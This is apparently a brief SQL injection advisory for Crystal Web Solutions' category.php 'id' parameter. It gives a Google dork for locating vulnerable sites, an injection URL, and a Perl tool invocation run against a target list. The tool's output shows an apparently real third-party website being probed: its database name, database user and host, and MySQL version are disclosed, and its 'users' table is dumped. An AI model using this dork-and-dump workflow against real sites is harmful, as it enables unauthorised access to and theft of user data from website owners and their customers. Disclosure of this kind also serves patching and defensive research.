Crystal Web Solutions suffers from a remote SQL injection vulnerability.
11868ae3fe5e959b787b3f7494e58d05c481ac0f1538d08dfd7838897a686cab
=============================================================
Crystal Web Solutions (category.php) SQL Injection
=============================================================
Vendor: Crystal Web Solutions ( http://www.crystal-web.co.uk)
Vendor Notification: 02 Jan 2011
Vulnerability Type: SQL Injection
Status: FIXED
Risk level: Low
Credit: All my Friends
Dork: "Web Design by Crystal Web Solutions"
POC:
- Http://LocalHost.com/path/category.php?id= [SQLi]
$ cd /Mysql/Perl
$ perl ec.txt -list crystalwebsolutions.txt -x /category.php?id=100 -v 5
........
Get: http://www.plantation-inn.co.uk/category.php?id=100'
[x] Gathering Server Configuration...
-Database: 108519_plantation
-User: 108519_piuser@lnh-www1h.bluehalo.myregisteredsite.com
-Version: 5.0.77
[x] Dumping database "108519_plantation" TB "users"
done.
=============================================================